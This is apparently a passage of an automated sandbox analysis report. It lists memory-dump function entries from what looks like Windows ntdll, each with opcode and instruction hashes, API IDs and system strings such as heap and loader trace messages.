                                          • Opcode ID: a9c89e469e55f2924c04fa91a12543557786e74b6d8e4d3935337f7977c31eda
                                          • Instruction ID: 9911f2fa07fbf437352087bcd4a88a7c9ae1c9bd16df8b6507dd11364ccd69f7
                                          • Opcode Fuzzy Hash: a9c89e469e55f2924c04fa91a12543557786e74b6d8e4d3935337f7977c31eda
                                          • Instruction Fuzzy Hash: 63718C71A047459FCB11DF28C888F8B7BB9EB99760F444868F94C8A257D734D588CBE2
                                          Strings
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 21AF327D
                                          • HEAP: , xrefs: 21AF3264
                                          • HEAP[%wZ]: , xrefs: 21AF3255
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 2e1210c902433f20b27177856efe0a9cb74983e183502903f460115002442358
                                          • Instruction ID: f701335378a2e8c553ba669d8e97db6e29dcfccce4494666f5188b7207edc1ef
                                          • Opcode Fuzzy Hash: 2e1210c902433f20b27177856efe0a9cb74983e183502903f460115002442358
                                          • Instruction Fuzzy Hash: 2A92AD71A042499FDB15CF68C440BAEBBF1FF49310F1480AEE959AB391D73AA945CF90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: @
                                          • API String ID: 3446177414-2766056989
                                          • Opcode ID: 7eae54be952fc6330b5fec14c4f6547a505b55ea1dd8f3a3147159eb654d4be9
                                          • Instruction ID: 6286d4efb8efaeaebd5c74eb3f4d606e3e8f785a620567b9de6f146bd15a6633
                                          • Opcode Fuzzy Hash: 7eae54be952fc6330b5fec14c4f6547a505b55ea1dd8f3a3147159eb654d4be9
                                          • Instruction Fuzzy Hash: 3422F0742046A18BEB19CF39C090772BBF1EF47B44F06855DE9868F296E335E582DB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: b06f9b34c113629c532cad7177541622d947e43b65a6a7f8a2c681133878179b
                                          • Instruction ID: 6bc46e0d17ec01bd36604c1ec0dda559117574f742f0eb72fb7e8ab470e63a08
                                          • Opcode Fuzzy Hash: b06f9b34c113629c532cad7177541622d947e43b65a6a7f8a2c681133878179b
                                          • Instruction Fuzzy Hash: 7CC27D71A083859FE729CF24C890B9BBBF5EF89744F04892DE9C987251D734D905CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 67a29dbc294cac9ed322032159c9373fb2eb101d7ba9c0de1a3c5a9081364bc1
                                          • Instruction ID: 8dc2480327b32acd80d99a148c7ba0642115081eeac4909f3ac40ff219c075e1
                                          • Opcode Fuzzy Hash: 67a29dbc294cac9ed322032159c9373fb2eb101d7ba9c0de1a3c5a9081364bc1
                                          • Instruction Fuzzy Hash: 9DA157729016299BDB25DF64CC88BAAB7B8FF49711F1001EAE909A7260D7359FC4CF50
                                          Strings
                                          • @, xrefs: 21B9C1F1
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 21B9C1C5
                                          • PreferredUILanguages, xrefs: 21B9C212
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: e9a3f5a1780ef705ba32f72c9467c9172e72aecd319cd0e4ef0dbf0139732372
                                          • Instruction ID: ee8134b0eb327e654f04eaedc470d3f5f666262a5d469d3c3f308c88f9ba3602
                                          • Opcode Fuzzy Hash: e9a3f5a1780ef705ba32f72c9467c9172e72aecd319cd0e4ef0dbf0139732372
                                          • Instruction Fuzzy Hash: EA414F72E0020DEFDF15CFD4C891BEEBBB8EB15701F1041BAE609A7250D7749A458B50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: ce672811bfd790ff3eda290138b3afc023ed78243c0a7ac2779d26ed697f0bea
                                          • Instruction ID: 42c2f6202c1efef4b9181d183777a7441465f85e2d482f80b1aab4105661287e
                                          • Opcode Fuzzy Hash: ce672811bfd790ff3eda290138b3afc023ed78243c0a7ac2779d26ed697f0bea
                                          • Instruction Fuzzy Hash: 66412532E046898FEB1ADBE5D940BADBBB8FF56340F10056DD920EB7A1D7358902CB10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 62595c6a7f36ed6083fa1ee0c71772534a5e44ef45404c89cd63741979123da7
                                          • Instruction ID: ab92d04cca03eb3e8e9668178d57ec67f1693f8499808c66c4f6e72e26ceaf04
                                          • Opcode Fuzzy Hash: 62595c6a7f36ed6083fa1ee0c71772534a5e44ef45404c89cd63741979123da7
                                          • Instruction Fuzzy Hash: BF11AC317168869FD61DCA24C5A1F6AB3BAEF62716F14815AF405CF265DB34E840C750
                                          Strings
                                          • Process initialization failed with status 0x%08lx, xrefs: 21B620F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B62104
                                          • LdrpInitializationFailure, xrefs: 21B620FA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 51fec0792f070d1b878a797941991aeaa68e55b8af4f3e9a3cc8cf42a11aee72
                                          • Instruction ID: 05919361b4edfe067b000f6ea0fd7e89a256f4495d2feb745f7db2f8e9e41c28
                                          • Opcode Fuzzy Hash: 51fec0792f070d1b878a797941991aeaa68e55b8af4f3e9a3cc8cf42a11aee72
                                          • Instruction Fuzzy Hash: E3F0FC75A40248BFFB18DB49CC92F9637BCFB55B54F510059F60477291D2B0A900CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 20b66b42453104e9bde6a5eadd35199d29f4534957efb30b69c4cd9b99e21e3d
                                          • Instruction ID: 85cfe4c7ebe260ea2055d372884ca954e991a23e055871beec853ffbb92e8270
                                          • Opcode Fuzzy Hash: 20b66b42453104e9bde6a5eadd35199d29f4534957efb30b69c4cd9b99e21e3d
                                          • Instruction Fuzzy Hash: B1714B71A0014A9FDB05CFA8C991FAEB7F8FF18704F144069E905E7252EA39EE15CB60
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 21B6895E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 7e66d5aa78ad27fb4eed67fc71fb8d9bf8823e11af7967c53d6a9c61c85a0539
                                          • Instruction ID: df5cd5d1fb62b522d879d05793f471ed459e8b6a94c5b1e31fec3d0b96db8cfc
                                          • Opcode Fuzzy Hash: 7e66d5aa78ad27fb4eed67fc71fb8d9bf8823e11af7967c53d6a9c61c85a0539
                                          • Instruction Fuzzy Hash: 6C01F732200386AFEE2DCE52C9C4A567B7DEFBA390B04243CF641071A5CB206844CB92
                                          Strings
                                          • LdrResSearchResource Exit, xrefs: 21AEAA25
                                          • LdrResSearchResource Enter, xrefs: 21AEAA13
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: 749c6a1bb2e501ee3739c1ee9f0a32b07ae2818d4b6efa33c218a14552a2a085
                                          • Instruction ID: 4062caa1d982ebfc0d3561ee8dd633ba80f950ca0672f4ae68aa458cb299e251
                                          • Opcode Fuzzy Hash: 749c6a1bb2e501ee3739c1ee9f0a32b07ae2818d4b6efa33c218a14552a2a085
                                          • Instruction Fuzzy Hash: 38E1CD71E00219AFEF16CF99D994B9EBBB9FF19300F14857AE906E7261D7348940DB10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: c34f7d323080c7a667bafd9733b88e6b1b8ef51020be5df2b771fe0973508e8f
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 1AC1AE312083429FEB19CF28C841B6BBBF5EFCA754F044A2DF6958A2A0D775D505CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 48fe4cce6271d8ae5fc47fa8778f6ea9832b9f4ed1f40a907539a1ee99c5b5d8
                                          • Instruction ID: 6f5356c500e4da25edd171cbc60ead6cb4f04525e26acff42ee7cf129a9ede9e
                                          • Opcode Fuzzy Hash: 48fe4cce6271d8ae5fc47fa8778f6ea9832b9f4ed1f40a907539a1ee99c5b5d8
                                          • Instruction Fuzzy Hash: 69617E75E00659AFEB59CFA8C980BAEFBF9FB48740F20406DE659EB251D7319900CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: ec76b79db101eea6e2ca42c2f909079670826770b03b0f4611bc7b82746551d9
                                          • Instruction ID: 7b0ccc83d535ff30dd078f3804af3e5e231c98d93620ad490e492e9231e5cb57
                                          • Opcode Fuzzy Hash: ec76b79db101eea6e2ca42c2f909079670826770b03b0f4611bc7b82746551d9
                                          • Instruction Fuzzy Hash: 70513771E0061EAFDF05CFA5CD90FEEBBB8EB58B54F110529E615B7290D6309A05CB60
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 21AEA2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 21AEA309
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: cb3b50a075aeed4783a20b9d1fa422c47463ce684383eedface770e122daf00e
                                          • Instruction ID: befd7c9812725c52743652d4d1b8efcc749cc8526e13cee8de450c26206b3de4
                                          • Opcode Fuzzy Hash: cb3b50a075aeed4783a20b9d1fa422c47463ce684383eedface770e122daf00e
                                          • Instruction Fuzzy Hash: 3A41DF34E00646DFDB05CF59D854B5E7BB8FF96300F1480A9E919DB2A1E3B5CA00DB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 690eea78ee17356b621e669160b067da7e8bf8501c06e041a9831d8bcfdc7c1e
                                          • Instruction ID: 8833bea0f9c5e16a64c0636e80db4db16aba7b2a4e259cc8bd8a66785ad82de2
                                          • Opcode Fuzzy Hash: 690eea78ee17356b621e669160b067da7e8bf8501c06e041a9831d8bcfdc7c1e
                                          • Instruction Fuzzy Hash: 8C01DCB2144680AFE311CF24CD45F1677F8EB96725F028939F658C7194E334E904CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 891a299914b18f6caf46a9afa00a9d38ddb8600a4a90b3dd71efb8dc1e37381f
                                          • Instruction ID: 06663b325ce2f663301104b8f7c047b1b4a1b7d3ce73bcf1a7940b0a626b5fd6
                                          • Opcode Fuzzy Hash: 891a299914b18f6caf46a9afa00a9d38ddb8600a4a90b3dd71efb8dc1e37381f
                                          • Instruction Fuzzy Hash: 37829A71E002198FEB26CFA8C988BEDBBB5BF49350F148179E91DAB295D7319D41CB40
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a27eb739d611ddf5fd3a5e7ada29475839b38d6f52e2657d9dd539771262b4d8
                                          • Instruction ID: 39cb732a6b4e7811597c085a8b4a896a34adf0da3cf7da7a6b4d83e9001055d3
                                          • Opcode Fuzzy Hash: a27eb739d611ddf5fd3a5e7ada29475839b38d6f52e2657d9dd539771262b4d8
                                          • Instruction Fuzzy Hash: 69E15A71608342CFC705CF28C594A5ABBE0FF89314F058A6DE99D97352EB31E905CB92
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f72e0a14f5949391861d14020632eb099d8c0e2545a65d1a82d3cd520fa874e8
                                          • Instruction ID: c83d3dfc8aa6f4dd3196d16bd28d6195f300df695f28e94c77e3940647d1c866
                                          • Opcode Fuzzy Hash: f72e0a14f5949391861d14020632eb099d8c0e2545a65d1a82d3cd520fa874e8
                                          • Instruction Fuzzy Hash: F5A13731E00655AFEB19CB68C958F9EBFB4EF06750F114269EA10AB2A1C7789D40CBD1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83c8585adde90465dc1647fb3ae58ab876d58a6c089cee8bdf5fd3ff475af937
                                          • Instruction ID: 05759595a93a2a9cffbbfff5b2bf1c9c154a55084c52c99b848cd3544a205cc0
                                          • Opcode Fuzzy Hash: 83c8585adde90465dc1647fb3ae58ab876d58a6c089cee8bdf5fd3ff475af937
                                          • Instruction Fuzzy Hash: B541B1756143029FD729CF28C884A5BBBF9FF88314F10492EE596C7621DB36E844CB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 48c2eb4ba574b6ba7ee8de579a17f2b94ae7d091890047857bbc80fb8601ef13
                                          • Instruction ID: cea3fbb25a4daea10434282c1ac83b701f5af55eb922943f60848102bdabf6f9
                                          • Opcode Fuzzy Hash: 48c2eb4ba574b6ba7ee8de579a17f2b94ae7d091890047857bbc80fb8601ef13
                                          • Instruction Fuzzy Hash: A141C1B1A41705CFC71ADF28C948B49B7B5FF99310F1486BBC4199B2A1DB309A41CF91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 5dfa3adc69828a206ca91eef93ce23115c396d9e7ecfd72d57a868a9acce6ac2
                                          • Instruction ID: 9f5b2748dcadedf59e3cd8f2d6b0017a3fe2fe8e0d04a1bbc3f8238a047f0675
                                          • Opcode Fuzzy Hash: 5dfa3adc69828a206ca91eef93ce23115c396d9e7ecfd72d57a868a9acce6ac2
                                          • Instruction Fuzzy Hash: C6416A725083459FD724CF29C844B9BBBF8FF98764F004A2EF99887250D7349904CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 25a9742d44cd0f6aaf568335df1d43b38644497d0c9257f61cf5f55088921fbd
                                          • Instruction ID: 7dda97385b3d6c0181ce4c0a376f80d8e48b36418ea6f98193bdf955de6e3e50
                                          • Opcode Fuzzy Hash: 25a9742d44cd0f6aaf568335df1d43b38644497d0c9257f61cf5f55088921fbd
                                          • Instruction Fuzzy Hash: 8C41BE306003028FD715CF28D998B2ABBEAFF89350F11447DEA49DB2A1DB34D941CB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: c4de428d3bf2e49efabbbc19e761c4a5f78c27c3a2ceae5d1b0cd6da6c1edd3d
                                          • Instruction ID: 0c7b12f4ae07b8b3babc17ccf86fcb1eaa6b9f108a639058eb2ec1ab0c9db9c6
